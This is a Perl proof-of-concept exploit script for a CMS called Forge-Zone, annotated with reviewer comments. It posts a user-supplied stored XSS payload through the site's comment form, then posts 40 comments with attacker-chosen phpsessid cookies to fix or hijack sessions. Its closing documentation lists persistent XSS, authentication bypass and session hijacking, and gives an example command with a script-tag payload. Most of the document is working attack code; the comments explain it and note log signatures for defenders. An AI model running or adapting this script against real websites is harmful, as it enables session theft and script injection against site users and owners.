#!/usr/bin/perl -Uw
# Forge-Zone CMS proof-of-concept script (see the POD at the end of the file).
# Flow as written: parse --target/--payload, fetch the target host's robots.txt
# and print it, POST the payload as a comment, then loop 40 times posting a
# comment with a client-chosen phpsessid cookie and print the resulting cookie.
# NOTE(review): -U ("unsafe operations") only changes behaviour when taint mode
# (-T) is also on, which it is not here; -w turns on warnings globally.
use 5.010;            # needed for `say`
use strict;
use File::Fetch;
use diagnostics;      # verbose explanations attached to every warning
use Pod::Usage;
use Getopt::Long;
use Data::Dumper;     # loaded but not used anywhere below
use HTTP::Cookies;
use LWP::UserAgent;
use Term::ANSIColor;
# NOTE(review): `BEGIN:` followed by a statement is a plain label, not a BEGIN block.
BEGIN:
# $options receives GetOptions' success flag but is never checked, so an
# unknown option only yields Getopt::Long's warning and execution continues.
my $options = GetOptions(
    'payload|p=s' => \my $Payload,
    'target|t=s' => \my $Target,
);
# `$Payload && $Target` yields undef when either option is absent, so the
# defined() test does catch a missing option; a falsy value such as "0" or ""
# would pass, though. NOTE(review): pod2usage(1) prints the SYNOPSIS/USAGE
# sections, which the POD at the bottom of this file does not define.
pod2usage(1) if(not defined($Payload && $Target));
# Cookie jar persisted to cookie.txt in the current working directory
# (autosave => 1), keeping session cookies too (ignore_discard => 1). This
# file is a local artifact left behind by running the script.
my $cookie_jar = HTTP::Cookies->new(
    file => "cookie.txt",
    autosave => 1,
    ignore_discard => 1,
);
my $UserAgent = LWP::UserAgent->new;
$UserAgent->cookie_jar( $cookie_jar );
say colored("\n[*] Target: $Target\n",'blue');
say colored("[+] Reading robots.txt file to find other targets...",'yellow');
# Split the target URL on "/": for "http://host/path" element 2 is the host
# (elements 0 and 1 are "http:" and ""). The URL shape is not validated.
my @Uri=split("/",$Target);
# Fetch http://<host>/robots.txt into $file. fetch()'s return value is not
# checked; on failure $file stays undef and the say() below only warns.
File::Fetch->new
(
uri => "http://$Uri[2]/robots.txt")->
fetch(to => \(my $file)
);
say($file);
say colored("\n[*] Sending XSS payload\n",'yellow');
# multipart/form-data POST to the target; $Payload is sent verbatim in 'data'.
my $response = $UserAgent->post($Target,
    Content_Type => 'form-data',
    Content => [
        'action' => "ajouterComment",
        'id' => 3,
        'data' => $Payload,
    ]
);
# Body is read but never used, and the HTTP status is not checked.
my $content = $response->decoded_content();
say colored ("[*] Now collecting 40 valids PHPSESSID in DataBase...",'blue');
# 40 iterations, each with a fresh UserAgent and an in-memory cookie jar.
# The jar is seeded with a client-chosen phpsessid value "Giveme_phpsessid.<i>"
# for the host (positional HTTP::Cookies->set_cookie arguments: version, key,
# value, path, domain, port, path_spec, secure, maxage, discard), the same
# comment form is posted with data "XXX", and the first entry of the jar's
# Set-Cookie3 dump is printed — whichever cookie the jar holds first after the
# response, so it may be the seeded value or one the server set.
# Defender note: the sequential "Giveme_phpsessid.N" cookie values and a burst
# of 40 near-identical comment POSTs are distinctive in server access logs.
for(my $i=1;$i<=40;$i++){
    my $ua = LWP::UserAgent->new;
    my $cookies = HTTP::Cookies->new();
    $cookies->set_cookie(0,'phpsessid', "Giveme_phpsessid.$i",'/',$Uri[2],80,0,0,86400,0);
    $ua->cookie_jar($cookies);
    my $Request = $ua->post($Target,
        Content_Type => 'form-data',
        Content => [
            'action' => "ajouterComment",
            'id' => 3,
            'data' => "XXX",
        ]
    );
    # Response body unused; status not checked.
    my $Output= $Request->decoded_content();
    # as_string renders the jar as "Set-Cookie3: name=value; ..." lines; the
    # split on ';' isolates the first attribute and the prefix is stripped.
    my $ValidPhpSessid= $cookies->as_string;
    my @PhpSessIdCollected = split(/;/, $ValidPhpSessid);
    $PhpSessIdCollected[0] =~ s/Set-Cookie3://g;
    say colored($PhpSessIdCollected[0],'green');
}
=pod
[1] Description:
Forge-Zone CMS multiple vulnerabilities:
- Persistent XSS
- Auth Bypassing
- Session HiJacking
Forge-Zone URL: http://forge-zone.fr
[2] Example:
perl fab.pl --target=http://vulnerable-site.com/#\!/blogletter/article/3 --payload=<script>MY XSS</script>
[3] Contact (to whip me \o/):
-Emails:
kmkz[at]tuxfamily[dot]org (for fun)
mail[dot]bourbon[at]gmail[dot]com
-Twitter: kmkz_security
-linkedin:
[FR] linkedin.com/pub/jean-marie-bourbon/56/928/469
[EN] linkedin.com/pub/jean-marie-bourbon/56/928/469/en
-IRC nickname: kmkz
=cut
__END__